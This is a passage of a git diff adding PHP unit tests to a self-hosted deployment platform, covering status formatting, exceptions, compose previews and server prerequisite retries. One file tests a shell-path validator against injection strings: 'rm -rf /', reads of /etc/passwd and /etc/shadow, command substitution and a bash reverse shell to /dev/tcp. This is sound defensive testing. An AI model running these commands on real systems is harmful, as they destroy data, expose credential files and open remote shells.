validateShellSafePath('postgres', 'database name')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('my_database', 'database name')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('db-prod', 'database name')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('test123', 'database name')) + ->not->toThrow(Exception::class); +}); diff --git a/tests/Unit/DeploymentExceptionTest.php b/tests/Unit/DeploymentExceptionTest.php new file mode 100644 index 000000000..5dd448df4 --- /dev/null +++ b/tests/Unit/DeploymentExceptionTest.php @@ -0,0 +1,71 @@ +getProperty('dontReport'); + $property->setAccessible(true); + $dontReport = $property->getValue($handler); + + expect($dontReport)->toContain(DeploymentException::class); +}); + +test('DeploymentException can be created with a message', function () { + $exception = new DeploymentException('Test deployment error'); + + expect($exception->getMessage())->toBe('Test deployment error'); + expect($exception)->toBeInstanceOf(Exception::class); +}); + +test('DeploymentException can be created with a message and code', function () { + $exception = new DeploymentException('Test error', 69420); + + expect($exception->getMessage())->toBe('Test error'); + expect($exception->getCode())->toBe(69420); +}); + +test('DeploymentException can be created from another exception', function () { + $originalException = new RuntimeException('Original error', 500); + $deploymentException = DeploymentException::fromException($originalException); + + expect($deploymentException->getMessage())->toBe('Original error'); + expect($deploymentException->getCode())->toBe(500); + expect($deploymentException->getPrevious())->toBe($originalException); +}); + +test('DeploymentException is not reported when thrown', function () { + $handler = new Handler(app()); + + // DeploymentException should not be reported (logged) + $exception = new DeploymentException('Test deployment failure'); + + // Check that the exception should not be reported + $reflection = new ReflectionClass($handler); + $method = $reflection->getMethod('shouldReport'); + $method->setAccessible(true); + + $shouldReport = $method->invoke($handler, $exception); + + expect($shouldReport)->toBeFalse(); +}); + +test('RuntimeException is still reported when thrown', function () { + $handler = new Handler(app()); + + // RuntimeException should still be reported (this is for Coolify bugs) + $exception = new RuntimeException('Unexpected error in Coolify code'); + + // Check that the exception should be reported + $reflection = new ReflectionClass($handler); + $method = $reflection->getMethod('shouldReport'); + $method->setAccessible(true); + + $shouldReport = $method->invoke($handler, $exception); + + expect($shouldReport)->toBeTrue(); +}); diff --git a/tests/Unit/EnvVarInputComponentTest.php b/tests/Unit/EnvVarInputComponentTest.php new file mode 100644 index 000000000..f4fc8bcb5 --- /dev/null +++ b/tests/Unit/EnvVarInputComponentTest.php @@ -0,0 +1,67 @@ +required)->toBeFalse() + ->and($component->disabled)->toBeFalse() + ->and($component->readonly)->toBeFalse() + ->and($component->defaultClass)->toBe('input') + ->and($component->availableVars)->toBe([]); +}); + +it('uses provided id', function () { + $component = new EnvVarInput(id: 'env-key'); + + expect($component->id)->toBe('env-key'); +}); + +it('accepts available vars', function () { + $vars = [ + 'team' => ['DATABASE_URL', 'API_KEY'], + 'project' => ['STRIPE_KEY'], + 'environment' => ['DEBUG'], + ]; + + $component = new EnvVarInput(availableVars: $vars); + + expect($component->availableVars)->toBe($vars); +}); + +it('accepts required parameter', function () { + $component = new EnvVarInput(required: true); + + expect($component->required)->toBeTrue(); +}); + +it('accepts disabled state', function () { + $component = new EnvVarInput(disabled: true); + + expect($component->disabled)->toBeTrue(); +}); + +it('accepts readonly state', function () { + $component = new EnvVarInput(readonly: true); + + expect($component->readonly)->toBeTrue(); +}); + +it('accepts autofocus parameter', function () { + $component = new EnvVarInput(autofocus: true); + + expect($component->autofocus)->toBeTrue(); +}); + +it('accepts authorization properties', function () { + $component = new EnvVarInput( + canGate: 'update', + canResource: 'resource', + autoDisable: false + ); + + expect($component->canGate)->toBe('update') + ->and($component->canResource)->toBe('resource') + ->and($component->autoDisable)->toBeFalse(); +}); diff --git a/tests/Unit/ExcludeFromHealthCheckTest.php b/tests/Unit/ExcludeFromHealthCheckTest.php new file mode 100644 index 000000000..6776d09b7 --- /dev/null +++ b/tests/Unit/ExcludeFromHealthCheckTest.php @@ -0,0 +1,151 @@ +toContain('// If all containers are excluded, calculate status from excluded containers') + ->toContain('// but mark it with :excluded to indicate monitoring is disabled') + ->toContain('if ($relevantContainers->isEmpty()) {') + ->toContain('return $this->calculateExcludedStatus($containers, $excludedContainers);'); + + // Check that the trait uses ContainerStatusAggregator and appends :excluded suffix + $traitFile = file_get_contents(__DIR__.'/../../app/Traits/CalculatesExcludedStatus.php'); + expect($traitFile) + ->toContain('ContainerStatusAggregator') + ->toContain('appendExcludedSuffix') + ->toContain('$aggregator->aggregateFromContainers($excludedOnly)') + ->toContain("return 'degraded:excluded';") + ->toContain("return 'paused:excluded';") + ->toContain("return 'exited';") + ->toContain('return "$status:excluded";'); // For running:healthy:excluded +}); + +it('ensures Service model returns excluded status when all services excluded', function () { + $serviceModelFile = file_get_contents(__DIR__.'/../../app/Models/Service.php'); + + // Check that when all services are excluded from status checks, + // the Service model calculates real status and returns it with :excluded suffix + expect($serviceModelFile) + ->toContain('exclude_from_status') + ->toContain(':excluded') + ->toContain('CalculatesExcludedStatus'); +}); + +it('ensures Service model returns unknown:unknown:excluded when no containers exist', function () { + $serviceModelFile = file_get_contents(__DIR__.'/../../app/Models/Service.php'); + + // Check that when a service has no applications or databases at all, + // the Service model returns 'unknown:unknown:excluded' instead of 'exited' + // This prevents misleading status display when containers don't exist + expect($serviceModelFile) + ->toContain('// If no status was calculated at all (no containers exist), return unknown') + ->toContain('if ($excludedStatus === null && $excludedHealth === null) {') + ->toContain("return 'unknown:unknown:excluded';"); +}); + +it('ensures GetContainersStatus calculates excluded status when all containers excluded', function () { + $getContainersStatusFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // Check that when all containers are excluded, the aggregateApplicationStatus + // method calculates and returns status with :excluded suffix + expect($getContainersStatusFile) + ->toContain('// If all containers are excluded, calculate status from excluded containers') + ->toContain('if ($relevantStatuses->isEmpty()) {') + ->toContain('return $this->calculateExcludedStatusFromStrings($containerStatuses);'); +}); + +it('ensures exclude_from_hc flag is properly checked in ComplexStatusCheck', function () { + $complexStatusCheckFile = file_get_contents(__DIR__.'/../../app/Actions/Shared/ComplexStatusCheck.php'); + + // Verify that exclude_from_hc is parsed using trait helper + expect($complexStatusCheckFile) + ->toContain('$excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw);'); +}); + +it('ensures exclude_from_hc flag is properly checked in GetContainersStatus', function () { + $getContainersStatusFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // Verify that exclude_from_hc is parsed using trait helper + expect($getContainersStatusFile) + ->toContain('$excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw);'); +}); + +it('ensures UI displays excluded status correctly in status component', function () { + $servicesStatusFile = file_get_contents(__DIR__.'/../../resources/views/components/status/services.blade.php'); + + // Verify that the status component uses formatContainerStatus helper to display status + expect($servicesStatusFile) + ->toContain('formatContainerStatus($complexStatus)'); +}); + +it('ensures UI handles excluded status in service heading buttons', function () { + $headingFile = file_get_contents(__DIR__.'/../../resources/views/livewire/project/service/heading.blade.php'); + + // Verify that the heading properly handles running/degraded/exited status with :excluded suffix + // The logic should use contains() to match the base status (running, degraded, exited) + // which will work for both regular statuses and :excluded suffixed ones + expect($headingFile) + ->toContain('str($service->status)->contains(\'running\')') + ->toContain('str($service->status)->contains(\'degraded\')') + ->toContain('str($service->status)->contains(\'exited\')'); +}); + +/** + * Unit tests for YAML validation in CalculatesExcludedStatus trait + */ +it('ensures YAML validation has proper exception handling for parse errors', function () { + $traitFile = file_get_contents(__DIR__.'/../../app/Traits/CalculatesExcludedStatus.php'); + + // Verify that ParseException is imported and caught separately from generic Exception + expect($traitFile) + ->toContain('use Symfony\Component\Yaml\Exception\ParseException') + ->toContain('use Illuminate\Support\Facades\Log') + ->toContain('} catch (ParseException $e) {') + ->toContain('} catch (\Exception $e) {'); +}); + +it('ensures YAML validation logs parse errors with context', function () { + $traitFile = file_get_contents(__DIR__.'/../../app/Traits/CalculatesExcludedStatus.php'); + + // Verify that parse errors are logged with useful context (error message, line, snippet) + expect($traitFile) + ->toContain('Log::warning(\'Failed to parse Docker Compose YAML for health check exclusions\'') + ->toContain('\'error\' => $e->getMessage()') + ->toContain('\'line\' => $e->getParsedLine()') + ->toContain('\'snippet\' => $e->getSnippet()'); +}); + +it('ensures YAML validation logs unexpected errors', function () { + $traitFile = file_get_contents(__DIR__.'/../../app/Traits/CalculatesExcludedStatus.php'); + + // Verify that unexpected errors are logged with error level + expect($traitFile) + ->toContain('Log::error(\'Unexpected error parsing Docker Compose YAML\'') + ->toContain('\'trace\' => $e->getTraceAsString()'); +}); + +it('ensures YAML validation checks structure after parsing', function () { + $traitFile = file_get_contents(__DIR__.'/../../app/Traits/CalculatesExcludedStatus.php'); + + // Verify that parsed result is validated to be an array + expect($traitFile) + ->toContain('if (! is_array($dockerCompose)) {') + ->toContain('Log::warning(\'Docker Compose YAML did not parse to array\''); + + // Verify that services is validated to be an array + expect($traitFile) + ->toContain('if (! is_array($services)) {') + ->toContain('Log::warning(\'Docker Compose services is not an array\''); +}); diff --git a/tests/Unit/FileStorageSecurityTest.php b/tests/Unit/FileStorageSecurityTest.php new file mode 100644 index 000000000..a89a209b1 --- /dev/null +++ b/tests/Unit/FileStorageSecurityTest.php @@ -0,0 +1,93 @@ + validateShellSafePath('/tmp$(whoami)', 'storage path')) + ->toThrow(Exception::class); +}); + +test('file storage rejects command injection with semicolon', function () { + expect(fn () => validateShellSafePath('/data; rm -rf /', 'storage path')) + ->toThrow(Exception::class); +}); + +test('file storage rejects command injection with pipe', function () { + expect(fn () => validateShellSafePath('/app | cat /etc/passwd', 'storage path')) + ->toThrow(Exception::class); +}); + +test('file storage rejects command injection with backticks', function () { + expect(fn () => validateShellSafePath('/tmp`id`/data', 'storage path')) + ->toThrow(Exception::class); +}); + +test('file storage rejects command injection with ampersand', function () { + expect(fn () => validateShellSafePath('/data && whoami', 'storage path')) + ->toThrow(Exception::class); +}); + +test('file storage rejects command injection with redirect operators', function () { + expect(fn () => validateShellSafePath('/tmp > /tmp/evil', 'storage path')) + ->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('/data < /etc/shadow', 'storage path')) + ->toThrow(Exception::class); +}); + +test('file storage rejects reverse shell payload', function () { + expect(fn () => validateShellSafePath('/tmp$(bash -i >& /dev/tcp/10.0.0.1/8888 0>&1)', 'storage path')) + ->toThrow(Exception::class); +}); + +test('file storage escapes paths properly', function () { + $path = "/var/www/app's data"; + $escaped = escapeshellarg($path); + + expect($escaped)->toBe("'/var/www/app'\\''s data'"); +}); + +test('file storage escapes paths with spaces', function () { + $path = '/var/www/my app/data'; + $escaped = escapeshellarg($path); + + expect($escaped)->toBe("'/var/www/my app/data'"); +}); + +test('file storage escapes paths with special characters', function () { + $path = '/var/www/app (production)/data'; + $escaped = escapeshellarg($path); + + expect($escaped)->toBe("'/var/www/app (production)/data'"); +}); + +test('file storage accepts legitimate absolute paths', function () { + expect(fn () => validateShellSafePath('/var/www/app', 'storage path')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('/tmp/uploads', 'storage path')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('/data/storage', 'storage path')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('/app/persistent-data', 'storage path')) + ->not->toThrow(Exception::class); +}); + +test('file storage accepts paths with underscores and hyphens', function () { + expect(fn () => validateShellSafePath('/var/www/my_app-data', 'storage path')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('/tmp/upload_dir-2024', 'storage path')) + ->not->toThrow(Exception::class); +}); diff --git a/tests/Unit/FormatBytesTest.php b/tests/Unit/FormatBytesTest.php new file mode 100644 index 000000000..70c9c3039 --- /dev/null +++ b/tests/Unit/FormatBytesTest.php @@ -0,0 +1,42 @@ +toBe('0 B'); +}); + +it('formats null bytes correctly', function () { + expect(formatBytes(null))->toBe('0 B'); +}); + +it('handles negative bytes safely', function () { + expect(formatBytes(-1024))->toBe('0 B'); + expect(formatBytes(-100))->toBe('0 B'); +}); + +it('formats bytes correctly', function () { + expect(formatBytes(512))->toBe('512 B'); + expect(formatBytes(1023))->toBe('1023 B'); +}); + +it('formats kilobytes correctly', function () { + expect(formatBytes(1024))->toBe('1 KB'); + expect(formatBytes(2048))->toBe('2 KB'); + expect(formatBytes(1536))->toBe('1.5 KB'); +}); + +it('formats megabytes correctly', function () { + expect(formatBytes(1048576))->toBe('1 MB'); + expect(formatBytes(5242880))->toBe('5 MB'); +}); + +it('formats gigabytes correctly', function () { + expect(formatBytes(1073741824))->toBe('1 GB'); + expect(formatBytes(2147483648))->toBe('2 GB'); +}); + +it('respects precision parameter', function () { + expect(formatBytes(1536, 0))->toBe('2 KB'); + expect(formatBytes(1536, 1))->toBe('1.5 KB'); + expect(formatBytes(1536, 2))->toBe('1.5 KB'); + expect(formatBytes(1536, 3))->toBe('1.5 KB'); +}); diff --git a/tests/Unit/FormatContainerStatusTest.php b/tests/Unit/FormatContainerStatusTest.php new file mode 100644 index 000000000..f24aa8c52 --- /dev/null +++ b/tests/Unit/FormatContainerStatusTest.php @@ -0,0 +1,201 @@ +toBe('Running (healthy)'); + }); + + it('transforms running:unhealthy to Running (unhealthy)', function () { + $result = formatContainerStatus('running:unhealthy'); + + expect($result)->toBe('Running (unhealthy)'); + }); + + it('transforms exited:0 to Exited (0)', function () { + $result = formatContainerStatus('exited:0'); + + expect($result)->toBe('Exited (0)'); + }); + + it('transforms restarting:starting to Restarting (starting)', function () { + $result = formatContainerStatus('restarting:starting'); + + expect($result)->toBe('Restarting (starting)'); + }); + }); + + describe('excluded suffix handling', function () { + it('transforms running:unhealthy:excluded to Running (unhealthy, excluded)', function () { + $result = formatContainerStatus('running:unhealthy:excluded'); + + expect($result)->toBe('Running (unhealthy, excluded)'); + }); + + it('transforms running:healthy:excluded to Running (healthy, excluded)', function () { + $result = formatContainerStatus('running:healthy:excluded'); + + expect($result)->toBe('Running (healthy, excluded)'); + }); + + it('transforms exited:excluded to Exited (excluded)', function () { + $result = formatContainerStatus('exited:excluded'); + + expect($result)->toBe('Exited (excluded)'); + }); + + it('transforms stopped:excluded to Stopped (excluded)', function () { + $result = formatContainerStatus('stopped:excluded'); + + expect($result)->toBe('Stopped (excluded)'); + }); + }); + + describe('simple status format', function () { + it('transforms running to Running', function () { + $result = formatContainerStatus('running'); + + expect($result)->toBe('Running'); + }); + + it('transforms exited to Exited', function () { + $result = formatContainerStatus('exited'); + + expect($result)->toBe('Exited'); + }); + + it('transforms stopped to Stopped', function () { + $result = formatContainerStatus('stopped'); + + expect($result)->toBe('Stopped'); + }); + + it('transforms restarting to Restarting', function () { + $result = formatContainerStatus('restarting'); + + expect($result)->toBe('Restarting'); + }); + + it('transforms degraded to Degraded', function () { + $result = formatContainerStatus('degraded'); + + expect($result)->toBe('Degraded'); + }); + }); + + describe('Proxy status preservation', function () { + it('preserves Proxy:running without parsing colons', function () { + $result = formatContainerStatus('Proxy:running'); + + expect($result)->toBe('Proxy:running'); + }); + + it('preserves Proxy:exited without parsing colons', function () { + $result = formatContainerStatus('Proxy:exited'); + + expect($result)->toBe('Proxy:exited'); + }); + + it('preserves Proxy:healthy without parsing colons', function () { + $result = formatContainerStatus('Proxy:healthy'); + + expect($result)->toBe('Proxy:healthy'); + }); + + it('applies headline formatting to Proxy statuses', function () { + $result = formatContainerStatus('proxy:running'); + + expect($result)->toBe('Proxy (running)'); + }); + }); + + describe('headline transformation', function () { + it('applies headline to simple lowercase status', function () { + $result = formatContainerStatus('running'); + + expect($result)->toBe('Running'); + }); + + it('applies headline to uppercase status', function () { + // headline() adds spaces between capital letters + $result = formatContainerStatus('RUNNING'); + + expect($result)->toBe('R U N N I N G'); + }); + + it('applies headline to mixed case status', function () { + // headline() adds spaces between capital letters + $result = formatContainerStatus('RuNnInG'); + + expect($result)->toBe('Ru Nn In G'); + }); + + it('applies headline to first part of colon format', function () { + // headline() adds spaces between capital letters + $result = formatContainerStatus('RUNNING:healthy'); + + expect($result)->toBe('R U N N I N G (healthy)'); + }); + }); + + describe('edge cases', function () { + it('handles empty string gracefully', function () { + $result = formatContainerStatus(''); + + expect($result)->toBe(''); + }); + + it('handles multiple colons beyond expected format', function () { + // Only first two parts should be used (or three with :excluded) + $result = formatContainerStatus('running:healthy:extra:data'); + + expect($result)->toBe('Running (healthy)'); + }); + + it('handles status with spaces in health part', function () { + $result = formatContainerStatus('running:health check failed'); + + expect($result)->toBe('Running (health check failed)'); + }); + + it('handles single colon with empty second part', function () { + $result = formatContainerStatus('running:'); + + expect($result)->toBe('Running ()'); + }); + }); + + describe('real-world scenarios', function () { + it('handles typical running healthy container', function () { + $result = formatContainerStatus('running:healthy'); + + expect($result)->toBe('Running (healthy)'); + }); + + it('handles degraded container with health issues', function () { + $result = formatContainerStatus('degraded:unhealthy'); + + expect($result)->toBe('Degraded (unhealthy)'); + }); + + it('handles excluded unhealthy container', function () { + $result = formatContainerStatus('running:unhealthy:excluded'); + + expect($result)->toBe('Running (unhealthy, excluded)'); + }); + + it('handles proxy container status', function () { + $result = formatContainerStatus('Proxy:running'); + + expect($result)->toBe('Proxy:running'); + }); + + it('handles stopped container', function () { + $result = formatContainerStatus('stopped'); + + expect($result)->toBe('Stopped'); + }); + }); +}); diff --git a/tests/Unit/GetContainersStatusServiceAggregationTest.php b/tests/Unit/GetContainersStatusServiceAggregationTest.php new file mode 100644 index 000000000..4666d5fb7 --- /dev/null +++ b/tests/Unit/GetContainersStatusServiceAggregationTest.php @@ -0,0 +1,90 @@ +toContain('protected ?Collection $serviceContainerStatuses;'); + + // Verify aggregateServiceContainerStatuses method exists + expect($actionFile) + ->toContain('private function aggregateServiceContainerStatuses($services)') + ->toContain('$this->aggregateServiceContainerStatuses($services);'); + + // Verify service aggregation uses same logic as applications + expect($actionFile) + ->toContain('$hasUnknown = false;'); +}); + +it('services use same priority as applications in SSH path', function () { + $actionFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // Both aggregation methods should use the same priority logic + $priorityLogic = <<<'PHP' + if ($hasUnhealthy) { + $aggregatedStatus = 'running (unhealthy)'; + } elseif ($hasUnknown) { + $aggregatedStatus = 'running (unknown)'; + } else { + $aggregatedStatus = 'running (healthy)'; + } +PHP; + + // Should appear in service aggregation + expect($actionFile)->toContain($priorityLogic); +}); + +it('collects service containers before aggregating in SSH path', function () { + $actionFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // Verify service containers are collected, not immediately updated + expect($actionFile) + ->toContain('$key = $serviceLabelId.\':\'.$subType.\':\'.$subId;') + ->toContain('$this->serviceContainerStatuses->get($key)->put($containerName, $containerStatus);'); + + // Verify aggregation happens before ServiceChecked dispatch + expect($actionFile) + ->toContain('$this->aggregateServiceContainerStatuses($services);') + ->toContain('ServiceChecked::dispatch($this->server->team->id);'); +}); + +it('SSH and Sentinel paths use identical service aggregation logic', function () { + $jobFile = file_get_contents(__DIR__.'/../../app/Jobs/PushServerUpdateJob.php'); + $actionFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // Both should track the same status flags + expect($jobFile)->toContain('$hasUnknown = false;'); + expect($actionFile)->toContain('$hasUnknown = false;'); + + // Both should check for unknown status + expect($jobFile)->toContain('if (str($status)->contains(\'unknown\')) {'); + expect($actionFile)->toContain('if (str($status)->contains(\'unknown\')) {'); + + // Both should have elseif for unknown priority + expect($jobFile)->toContain('} elseif ($hasUnknown) {'); + expect($actionFile)->toContain('} elseif ($hasUnknown) {'); +}); + +it('handles service status updates consistently', function () { + $jobFile = file_get_contents(__DIR__.'/../../app/Jobs/PushServerUpdateJob.php'); + $actionFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // Both should parse service key with same format + expect($jobFile)->toContain('[$serviceId, $subType, $subId] = explode(\':\', $key);'); + expect($actionFile)->toContain('[$serviceId, $subType, $subId] = explode(\':\', $key);'); + + // Both should handle excluded containers + expect($jobFile)->toContain('$excludedContainers = collect();'); + expect($actionFile)->toContain('$excludedContainers = collect();'); +}); diff --git a/tests/Unit/Livewire/ApplicationGeneralPreviewTest.php b/tests/Unit/Livewire/ApplicationGeneralPreviewTest.php new file mode 100644 index 000000000..cea05a998 --- /dev/null +++ b/tests/Unit/Livewire/ApplicationGeneralPreviewTest.php @@ -0,0 +1,156 @@ +makePartial(); + $component->baseDirectory = '/'; + $component->dockerComposeLocation = '/docker-compose.yaml'; + $component->dockerComposeCustomBuildCommand = 'docker compose build'; + + $preview = $component->getDockerComposeBuildCommandPreviewProperty(); + + // Should be ./docker-compose.yaml, NOT .//docker-compose.yaml + expect($preview) + ->toBeString() + ->toContain('./docker-compose.yaml') + ->not->toContain('.//'); +}); + +it('correctly formats build command preview with nested baseDirectory', function () { + $component = Mockery::mock(General::class)->makePartial(); + $component->baseDirectory = '/backend'; + $component->dockerComposeLocation = '/docker-compose.yaml'; + $component->dockerComposeCustomBuildCommand = 'docker compose build'; + + $preview = $component->getDockerComposeBuildCommandPreviewProperty(); + + // Should be ./backend/docker-compose.yaml + expect($preview) + ->toBeString() + ->toContain('./backend/docker-compose.yaml'); +}); + +it('correctly formats build command preview with deeply nested baseDirectory', function () { + $component = Mockery::mock(General::class)->makePartial(); + $component->baseDirectory = '/apps/api/backend'; + $component->dockerComposeLocation = '/docker-compose.prod.yaml'; + $component->dockerComposeCustomBuildCommand = 'docker compose build'; + + $preview = $component->getDockerComposeBuildCommandPreviewProperty(); + + expect($preview) + ->toBeString() + ->toContain('./apps/api/backend/docker-compose.prod.yaml'); +}); + +it('uses BUILD_TIME_ENV_PATH constant instead of hardcoded path in build command preview', function () { + $component = Mockery::mock(General::class)->makePartial(); + $component->baseDirectory = '/'; + $component->dockerComposeLocation = '/docker-compose.yaml'; + $component->dockerComposeCustomBuildCommand = 'docker compose build'; + + $preview = $component->getDockerComposeBuildCommandPreviewProperty(); + + // Should contain the path from the constant + expect($preview) + ->toBeString() + ->toContain(ApplicationDeploymentJob::BUILD_TIME_ENV_PATH); +}); + +it('returns empty string for build command preview when no custom build command is set', function () { + $component = Mockery::mock(General::class)->makePartial(); + $component->baseDirectory = '/backend'; + $component->dockerComposeLocation = '/docker-compose.yaml'; + $component->dockerComposeCustomBuildCommand = null; + + $preview = $component->getDockerComposeBuildCommandPreviewProperty(); + + expect($preview)->toBe(''); +}); + +it('prevents double slashes in start command preview when baseDirectory is root', function () { + $component = Mockery::mock(General::class)->makePartial(); + $component->baseDirectory = '/'; + $component->dockerComposeLocation = '/docker-compose.yaml'; + $component->dockerComposeCustomStartCommand = 'docker compose up -d'; + + $preview = $component->getDockerComposeStartCommandPreviewProperty(); + + // Should be ./docker-compose.yaml, NOT .//docker-compose.yaml + expect($preview) + ->toBeString() + ->toContain('./docker-compose.yaml') + ->not->toContain('.//'); +}); + +it('correctly formats start command preview with nested baseDirectory', function () { + $component = Mockery::mock(General::class)->makePartial(); + $component->baseDirectory = '/frontend'; + $component->dockerComposeLocation = '/compose.yaml'; + $component->dockerComposeCustomStartCommand = 'docker compose up -d'; + + $preview = $component->getDockerComposeStartCommandPreviewProperty(); + + expect($preview) + ->toBeString() + ->toContain('./frontend/compose.yaml'); +}); + +it('uses workdir env placeholder in start command preview', function () { + $component = Mockery::mock(General::class)->makePartial(); + $component->baseDirectory = '/'; + $component->dockerComposeLocation = '/docker-compose.yaml'; + $component->dockerComposeCustomStartCommand = 'docker compose up -d'; + + $preview = $component->getDockerComposeStartCommandPreviewProperty(); + + // Start command should use {workdir}/.env, not build-time env + expect($preview) + ->toBeString() + ->toContain('{workdir}/.env') + ->not->toContain(ApplicationDeploymentJob::BUILD_TIME_ENV_PATH); +}); + +it('returns empty string for start command preview when no custom start command is set', function () { + $component = Mockery::mock(General::class)->makePartial(); + $component->baseDirectory = '/backend'; + $component->dockerComposeLocation = '/docker-compose.yaml'; + $component->dockerComposeCustomStartCommand = null; + + $preview = $component->getDockerComposeStartCommandPreviewProperty(); + + expect($preview)->toBe(''); +}); + +it('handles baseDirectory with trailing slash correctly in build command', function () { + $component = Mockery::mock(General::class)->makePartial(); + $component->baseDirectory = '/backend/'; + $component->dockerComposeLocation = '/docker-compose.yaml'; + $component->dockerComposeCustomBuildCommand = 'docker compose build'; + + $preview = $component->getDockerComposeBuildCommandPreviewProperty(); + + // rtrim should remove trailing slash to prevent double slashes + expect($preview) + ->toBeString() + ->toContain('./backend/docker-compose.yaml') + ->not->toContain('backend//'); +}); + +it('handles baseDirectory with trailing slash correctly in start command', function () { + $component = Mockery::mock(General::class)->makePartial(); + $component->baseDirectory = '/backend/'; + $component->dockerComposeLocation = '/docker-compose.yaml'; + $component->dockerComposeCustomStartCommand = 'docker compose up -d'; + + $preview = $component->getDockerComposeStartCommandPreviewProperty(); + + // rtrim should remove trailing slash to prevent double slashes + expect($preview) + ->toBeString() + ->toContain('./backend/docker-compose.yaml') + ->not->toContain('backend//'); +}); diff --git a/tests/Unit/Livewire/BoardingPrerequisitesTest.php b/tests/Unit/Livewire/BoardingPrerequisitesTest.php new file mode 100644 index 000000000..180a274d2 --- /dev/null +++ b/tests/Unit/Livewire/BoardingPrerequisitesTest.php @@ -0,0 +1,181 @@ +makePartial(); + $server->shouldReceive('validatePrerequisites') + ->andReturn([ + 'success' => false, + 'missing' => ['git'], + 'found' => ['curl', 'jq'], + ]); + + $activity = Mockery::mock(Activity::class); + $activity->id = 'test-activity-123'; + $server->shouldReceive('installPrerequisites') + ->once() + ->andReturn($activity); + + $component = Mockery::mock(Index::class)->makePartial(); + $component->createdServer = $server; + $component->prerequisiteInstallAttempts = 0; + $component->maxPrerequisiteInstallAttempts = 3; + + // Key assertion: verify activityMonitor event is dispatched with correct params + $component->shouldReceive('dispatch') + ->once() + ->with('activityMonitor', 'test-activity-123', 'prerequisitesInstalled') + ->andReturnSelf(); + + // Invoke the prerequisite check logic (simulating what validateServer does) + $validationResult = $component->createdServer->validatePrerequisites(); + if (! $validationResult['success']) { + if ($component->prerequisiteInstallAttempts >= $component->maxPrerequisiteInstallAttempts) { + throw new Exception('Max attempts exceeded'); + } + $activity = $component->createdServer->installPrerequisites(); + $component->prerequisiteInstallAttempts++; + $component->dispatch('activityMonitor', $activity->id, 'prerequisitesInstalled'); + } + + expect($component->prerequisiteInstallAttempts)->toBe(1); +}); + +it('does not retry when prerequisites install successfully', function () { + // This test verifies the callback behavior when installation succeeds. + + $server = Mockery::mock(Server::class)->makePartial(); + $server->shouldReceive('validatePrerequisites') + ->andReturn([ + 'success' => true, + 'missing' => [], + 'found' => ['git', 'curl', 'jq'], + ]); + + // installPrerequisites should NOT be called again + $server->shouldNotReceive('installPrerequisites'); + + $component = Mockery::mock(Index::class)->makePartial(); + $component->createdServer = $server; + $component->prerequisiteInstallAttempts = 1; + $component->maxPrerequisiteInstallAttempts = 3; + + // Simulate the callback logic + $validationResult = $component->createdServer->validatePrerequisites(); + if ($validationResult['success']) { + // Prerequisites are now valid, we'd call continueValidation() + // For the test, just verify we don't try to install again + expect($validationResult['success'])->toBeTrue(); + } +}); + +it('retries when prerequisites still missing after callback', function () { + // This test verifies retry logic in the callback. + + $server = Mockery::mock(Server::class)->makePartial(); + $server->shouldReceive('validatePrerequisites') + ->andReturn([ + 'success' => false, + 'missing' => ['git'], + 'found' => ['curl', 'jq'], + ]); + + $activity = Mockery::mock(Activity::class); + $activity->id = 'retry-activity-456'; + $server->shouldReceive('installPrerequisites') + ->once() + ->andReturn($activity); + + $component = Mockery::mock(Index::class)->makePartial(); + $component->createdServer = $server; + $component->prerequisiteInstallAttempts = 1; // Already tried once + $component->maxPrerequisiteInstallAttempts = 3; + + $component->shouldReceive('dispatch') + ->once() + ->with('activityMonitor', 'retry-activity-456', 'prerequisitesInstalled') + ->andReturnSelf(); + + // Simulate callback logic + $validationResult = $component->createdServer->validatePrerequisites(); + if (! $validationResult['success']) { + if ($component->prerequisiteInstallAttempts < $component->maxPrerequisiteInstallAttempts) { + $activity = $component->createdServer->installPrerequisites(); + $component->prerequisiteInstallAttempts++; + $component->dispatch('activityMonitor', $activity->id, 'prerequisitesInstalled'); + } + } + + expect($component->prerequisiteInstallAttempts)->toBe(2); +}); + +it('throws exception when max attempts exceeded', function () { + // This test verifies that we stop retrying after max attempts. + + $server = Mockery::mock(Server::class)->makePartial(); + $server->shouldReceive('validatePrerequisites') + ->andReturn([ + 'success' => false, + 'missing' => ['git', 'curl'], + 'found' => ['jq'], + ]); + + // installPrerequisites should NOT be called when at max attempts + $server->shouldNotReceive('installPrerequisites'); + + $component = Mockery::mock(Index::class)->makePartial(); + $component->createdServer = $server; + $component->prerequisiteInstallAttempts = 3; // Already at max + $component->maxPrerequisiteInstallAttempts = 3; + + // Simulate callback logic - should throw exception + $validationResult = $component->createdServer->validatePrerequisites(); + if (! $validationResult['success']) { + if ($component->prerequisiteInstallAttempts >= $component->maxPrerequisiteInstallAttempts) { + $missingCommands = implode(', ', $validationResult['missing']); + throw new Exception("Prerequisites ({$missingCommands}) could not be installed after {$component->maxPrerequisiteInstallAttempts} attempts."); + } + } +})->throws(Exception::class, 'Prerequisites (git, curl) could not be installed after 3 attempts'); + +it('does not install when prerequisites already present', function () { + // This test verifies we skip installation when everything is already installed. + + $server = Mockery::mock(Server::class)->makePartial(); + $server->shouldReceive('validatePrerequisites') + ->andReturn([ + 'success' => true, + 'missing' => [], + 'found' => ['git', 'curl', 'jq'], + ]); + + // installPrerequisites should NOT be called + $server->shouldNotReceive('installPrerequisites'); + + $component = Mockery::mock(Index::class)->makePartial(); + $component->createdServer = $server; + $component->prerequisiteInstallAttempts = 0; + $component->maxPrerequisiteInstallAttempts = 3; + + // Simulate validation logic + $validationResult = $component->createdServer->validatePrerequisites(); + if (! $validationResult['success']) { 